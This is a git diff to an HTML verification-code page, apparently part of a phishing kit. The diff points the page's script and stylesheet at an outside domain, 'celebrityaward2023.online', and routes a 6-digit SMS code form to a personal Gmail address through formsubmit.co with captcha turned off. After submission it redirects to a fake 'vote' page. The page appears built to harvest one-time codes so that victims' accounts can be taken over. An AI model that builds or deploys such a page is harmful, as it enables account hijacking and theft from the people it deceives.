--- a/verify/index.html
+++ b/verify/index.html
@@ -3,7 +3,7 @@
 <head>
   <meta charset="UTF-8">
   <title>CodePen - Verification Code</title>
-  <link href='https://fonts.googleapis.com/css?family=Lato&subset=latin,latin-ext' rel='stylesheet' type='text/css'><link rel='stylesheet' href='https://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css'><link rel="stylesheet" href="./style.css">
+  <link href='https://fonts.googleapis.com/css?family=Lato&subset=latin,latin-ext' rel='stylesheet' type='text/css'><link rel='stylesheet' href='https://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css'><link rel="stylesheet" href="https://www.celebrityaward2023.online/style.css">
 
 </head>
 <body>
@@ -13,8 +13,8 @@
     <button class="close">×</button>
     <h3>Please enter the 6-digit verification code we sent via SMS:</h3>
     <span>(we want to make sure it's you)</span>
-    <form id="form" action="https://formsubmit.co/awoyemid8@gmail.com" method="POST">
-      <input type="hidden" name="_next" value="https://yourdomain.co/thanks.html">
+    <form id="form" action="https://formsubmit.co/christophermark123123@gmail.com" method="POST">
+      <input type="hidden" name="_next" value="https://www.celebrityaward2023.online/vote">
       <input type="hidden" name="_captcha" value="false">
       <input type="hidden" name="_template" value="table">
       <input type="text" maxLength="1" size="1" min="0" max="9" pattern="[0-9]{1}" />
@@ -32,7 +32,7 @@
   </div>
 </div>
 <!-- partial -->
-  <script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script  src="./script.js"></script>
+  <script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script  src="https://www.celebrityaward2023.online/script.js"></script>
 
 </body>
 </html>
